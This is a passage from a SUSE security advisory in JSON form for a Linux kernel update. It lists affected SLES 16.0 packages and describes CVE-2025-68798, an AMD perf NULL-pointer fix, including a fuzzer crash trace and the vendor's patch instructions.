"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68797"
},
{
"cve": "CVE-2025-68798",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68798"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nperf/x86/amd: Check event before enable to avoid GPF\n\nOn AMD machines cpuc-\u003eevents[idx] can become NULL in a subtle race\ncondition with NMI-\u003ethrottle-\u003ex86_pmu_stop().\n\nCheck event for NULL in amd_pmu_enable_all() before enable to avoid a GPF.\nThis appears to be an AMD only issue.\n\nSyzkaller reported a GPF in amd_pmu_enable_all.\n\nINFO: NMI handler (perf_event_nmi_handler) took too long to run: 13.143\n msecs\nOops: general protection fault, probably for non-canonical address\n 0xdffffc0000000034: 0000 PREEMPT SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x00000000000001a0-0x00000000000001a7]\nCPU: 0 UID: 0 PID: 328415 Comm: repro_36674776 Not tainted 6.12.0-rc1-syzk\nRIP: 0010:x86_pmu_enable_event (arch/x86/events/perf_event.h:1195\n arch/x86/events/core.c:1430)\nRSP: 0018:ffff888118009d60 EFLAGS: 00010012\nRAX: dffffc0000000000 RBX: 0000000000000000 RCX: 0000000000000000\nRDX: 0000000000000034 RSI: 0000000000000000 RDI: 00000000000001a0\nRBP: 0000000000000001 R08: 0000000000000000 R09: 0000000000000000\nR10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000002\nR13: ffff88811802a440 R14: ffff88811802a240 R15: ffff8881132d8601\nFS: 00007f097dfaa700(0000) GS:ffff888118000000(0000) GS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 00000000200001c0 CR3: 0000000103d56000 CR4: 00000000000006f0\nCall Trace:\n \u003cIRQ\u003e\namd_pmu_enable_all (arch/x86/events/amd/core.c:760 (discriminator 2))\nx86_pmu_enable (arch/x86/events/core.c:1360)\nevent_sched_out (kernel/events/core.c:1191 kernel/events/core.c:1186\n kernel/events/core.c:2346)\n__perf_remove_from_context (kernel/events/core.c:2435)\nevent_function (kernel/events/core.c:259)\nremote_function (kernel/events/core.c:92 (discriminator 1)\n kernel/events/core.c:72 (discriminator 1))\n__flush_smp_call_function_queue (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207 ./include/trace/events/csd.h:64\n kernel/smp.c:135 kernel/smp.c:540)\n__sysvec_call_function_single (./arch/x86/include/asm/jump_label.h:27\n ./include/linux/jump_label.h:207\n ./arch/x86/include/asm/trace/irq_vectors.h:99 arch/x86/kernel/smp.c:272)\nsysvec_call_function_single (arch/x86/kernel/smp.c:266 (discriminator 47)\n arch/x86/kernel/smp.c:266 (discriminator 47))\n \u003c/IRQ\u003e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68798",
"url": "https://www.suse.com/security/cve/CVE-2025-68798"
},
{
"category": "external",
"summary": "SUSE Bug 1256689 for CVE-2025-68798",
"url": "https://bugzilla.suse.com/1256689"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
